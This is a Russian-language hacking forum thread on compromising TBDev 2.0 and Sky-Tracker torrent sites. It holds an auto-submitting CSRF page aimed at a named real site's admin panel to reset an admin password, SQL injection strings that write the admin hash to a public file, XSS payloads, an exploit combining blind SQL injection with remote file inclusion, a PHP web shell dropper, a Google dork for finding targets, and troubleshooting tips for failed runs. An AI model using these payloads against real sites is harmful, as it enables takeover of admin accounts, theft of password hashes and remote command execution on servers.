как вариант ... конечно ... заифреймить админу такую HTML -ку HTML: <body onload="p.submit()"> <form action="http://megalife.kz/torrent/admincp.php?op=iUsers" method="post" id="p"> <input type=hidden name="iname" value="ИМЯ_АДМИНА"> <input type=hidden name="ipass" value="НОВЫЙ_ПАРОЛЬ"> <input type=hidden name="imail" value="МАЙЛ_АДМИНА@mail.ru"> <input type=hidden name="isub" value="%D1%E4%E5%EB%E0%F2%FC"> <input type=hidden name="op" value="iUsers"> Как вы уже все поняли ... это сменит пароль нужному нам пользователю.... проявите немного фантазии и дело за малым
C:\php>php.exe sql.php http://adrez/ 1 123123123 123123 http://adrez/:123123123:123123 Trying to get your cookies... [DONE] Trying to get passhash: Exploit failed Пробывал сайтах на 5 везде одно и тоже .. Кто может помоч?
Я попробую тебе помоч -)) измени target_id с 1 на 3 или 4 или 10 ... вопщем посмотри id админа сначало и ставь его туда ... Т.к при установке этого движка в базу прописываеца не 1 ... у меня на локалхосте он равнялся 3
сделал видео _http://letitbit.net/download/262433962218/qwazar-sploit.rar.html _http://rapidshare.com/files/165895736/qwazar_sploit.rar.html Чтобы небыло вопросов, php из видео скачан отсюда _http://php.ru/download/php-5.2.1-Win32.zip
активные XSS в полях Email, Имя в AIM, Ваш MSN, Имя в Yahoo!, Имя в mIRC!, Сайт. Все работает если вводить при реге, если редактировать после реги, работать не будет. В поле Email скуля, тоесть при реге вводим мыло вида ' group by 100/*@blablabla.ru выдает что количество колонок не верное. Пример получения хеша админа: в поле имейл пишем :' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt'/* -- @ukrnet.ua по адрессу h**p://сайт/torrents/images/1.txt смотрим хеш юзера с id=1 пассивная хss www.site.ru/redir.php?url='><script>alert(/xak/)</script>
TBDev2 Blind SQL Injection+RFI Exploit Сплоит для TBDev 2.0. , от паблик версии отличается тем, что пытается залить шелл на сервер, помимо поиска пасса/соли. Если шелл залить не удаётся, значит вместо RFI прийдётся использовать LFI, или на сервере не работает функция file_put_contents, которую вполне можно заменить на обычный fopen/fwrite. LFI/RFI в админке используя параметр admincp.php?rootpath=. Если register_globals ON, то LFI/RFI доступны и не из админки, а из index.php, тот же параметр. Читайте комментарии к сплоиту, для заливки шелла, нужно положить код Code: <?php file_put_contents("torrents/.htaccess", ""); file_put_contents("torrents/shell.php", "<? system(\$_GET['cmd']) ?>"); ?> В файл доступный для чтения, на вашем сервере и прописать путь к нему в переменной $uploader. Так же сплоит может просто вытащить хеш, соль не закачивая шелл. Используется алгоритм бинарного поиска, так что запросов шлётся относительно немного, для слепой скули. (максимум 4 запроса на символ, вместо стабильно 16 при полном переборе, т.е. работает минимум в 4 раза быстрее, чем при полном переборе. И вообще для всех сплоитов со слепыми скулями, использующих BENCHMARK или перебор имён таблиц, стоит использовать алгоритм бинарного поиска, так быстрее) P.S. В каталоге 'admin' вообще лежит файлик (core.php) следующего содержания: Code: $op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op']; foreach ($_GET as $key => $value) $GLOBALS[$key] = $value; foreach ($_POST as $key => $value) $GLOBALS[$key] = $value; foreach ($_COOKIE as $key => $value) $GLOBALS[$key] = $value; Этот файл инклудится в admin.php . Dork:"Powered by TBDev v2.0" Качать тут: http://www.x2b.ru/get/14887
Запрос в поле майл делаю правильно новсе время вылетает ошибка You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* -- @uspp.ru'' at line 1 хотя на локальной машине все робит на ура вчем проблема может быть ?
Errcode 2 означает что папка не существует(т.е путь не правильный)... Если прав не хватает то Errcode 13 special for roa
Эта штука еще актуально на Sky-Tracker http://www.google.ru/search?hl=ru&q=Powered+by+Sky-Tracker&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
подскажите, зайдя на сайт как админ или сисоп я могу изменить файлы движковые или записать новые? хотябы в принципе это возможно или нет? Sky-Tracker
